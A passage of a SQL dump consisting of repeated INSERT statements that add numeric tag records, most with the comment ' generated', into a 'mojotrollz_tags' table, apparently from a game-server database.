INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3942, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3961, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3962, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3981, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3982, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3982, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4001, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4001, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4002, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4003, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4004, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4004, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4005, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4021, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4022, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4023, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4024, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4041, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4061, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4062, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4063, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4084, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4101, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4102, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4103, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4104, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4105, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4106, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4107, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4108, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4109, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4110, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4111, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4112, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4120, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4121, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4122, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4123, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4124, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4125, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4126, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4128, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4129, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4130, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4131, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4132, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4133, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4134, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4136, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4141, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4142, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4143, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4144, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4145, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4146, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4147, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4148, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4161, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4181, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4182, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4183, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4184, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4185, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4186, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4201, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4201, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4223, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4224, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4241, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4242, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4242, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4243, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4244, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4245, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4262, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4263, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4266, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4267, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4282, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4282, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4283, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4284, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4285, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4286, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4287, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4288, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4289, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4290, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4291, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4292, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4293, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4294, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4295, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4295, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4296, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4297, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4298, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4300, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4301, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4321, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4322, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4322, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4324, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4341, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4342, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4342, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4361, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4361, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4362, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4363, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4363, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4402, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4421, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4441, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4442, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4463, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4481, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4482, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4483, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4484, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4485, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4486, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4487, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4488, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4489, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4490, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4491, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4492, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4493, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4494, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4495, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4496, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4502, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4503, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4504, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4505, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4506, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4507, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4508, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4509, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4510, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4511, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4512, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4513, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4521, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4542, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4581, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4621, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4641, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4642, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4681, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4701, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4721, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4724, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4726, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4729, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4734, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4735, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4736, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4737, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4738, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4739, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4741, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4742, 4, 1, 229, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4742, 4, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4743, 4, 1, 229, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4743, 4, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4761, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4762, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4763, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4764, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4765, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4766, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4767, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4768, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4769, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4770, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4771, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4781, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4782, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4783, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4784, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4785, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4786, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4787, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4788, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4801, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4802, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4803, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4804, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4805, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4806, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4807, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4808, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4809, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4810, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4811, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4812, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4821, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4822, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4841, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4842, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4861, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4862, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4865, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4866, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4867, 4, 1, 229, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4867, 4, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4883, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4901, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4902, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4903, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4904, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4906, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4907, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4921, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4941, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4961, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4962, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4963, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4964, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4965, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4966, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4967, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4968, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4969, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4970, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4971, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4972, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4973, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4974, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4975, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4976, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4981, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4982, 4, 1, 229, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4982, 4, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4983, 4, 1, 229, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4983, 4, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, 